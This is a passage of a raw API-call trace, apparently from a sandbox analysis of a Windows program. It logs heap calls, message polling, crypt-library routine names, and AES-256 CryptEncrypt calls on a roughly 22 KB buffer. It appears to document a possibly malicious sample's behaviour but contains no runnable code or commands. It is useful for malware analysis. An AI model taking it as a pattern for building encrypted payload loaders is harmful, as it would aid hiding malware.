hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0041.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da318 [0041.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0041.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0041.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0041.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce68 [0041.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0041.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0041.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0041.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0041.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0041.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x56fe) returned 0xacce28 [0041.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0041.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0041.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0041.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0041.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0041.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0041.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0041.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0041.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0041.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0041.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0041.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0041.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0041.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0041.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0041.182] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0041.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0041.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0041.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0041.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0041.182] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0041.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0041.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0041.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0041.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0041.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0041.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0041.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0041.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0041.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0041.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0041.182] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0041.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0041.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0041.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0041.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2f8 [0041.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0041.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0041.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0041.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0041.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889430 [0041.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0041.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0041.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0041.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0041.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0041.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0041.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0041.183] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0041.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0041.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0041.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0041.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0041.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0041.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0041.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0041.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0041.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0041.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0041.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0041.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0041.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0041.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0041.183] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0041.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0041.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0041.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0041.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0041.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0041.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0041.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0041.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0041.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0041.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0041.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0041.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0041.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0041.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0041.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0041.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0041.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0041.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0041.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0041.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0041.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0041.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0041.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0041.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0041.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0041.184] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0041.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0041.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0041.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0041.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0041.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0041.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0041.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0041.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0041.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0041.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0041.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0041.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0041.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0041.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0041.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0041.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0041.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0041.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0041.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0041.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0041.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0041.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0041.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0041.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0041.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0041.185] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0041.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0041.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0041.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0041.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0041.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0041.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0041.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0041.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0041.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0041.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0041.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0041.185] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0041.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c958 [0041.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0041.185] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0041.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0041.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0041.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0041.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0041.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0041.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0041.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0041.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0041.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0041.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0041.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0041.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0041.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0041.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0041.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0041.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0041.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0041.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0041.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0041.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0041.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0041.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0041.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0041.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0041.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0041.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0041.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0041.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0041.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0041.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0041.186] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.186] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da268, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da268*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0041.186] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.187] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.187] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.187] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.187] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.187] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0041.187] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.187] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.187] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0041.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0041.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0041.187] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.187] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0041.187] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0041.187] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0041.187] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.187] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0041.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0041.188] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0041.188] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0041.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0041.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0041.188] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0041.188] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.188] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x56fe, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x5700) returned 1 [0041.188] CharLowerBuffW (in: lpsz="byte[22273]", cchLength=0xb | out: lpsz="byte[22273]") returned 0xb [0041.188] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0041.189] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.189] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xad2530*, pdwDataLen=0x6ae220*=0x56fe, dwBufLen=0x5700 | out: pbData=0xad2530*, pdwDataLen=0x6ae220*=0x5700) returned 1 [0041.189] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0041.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0041.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0041.189] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0041.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0041.189] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0041.194] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0041.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.194] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.195] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.195] 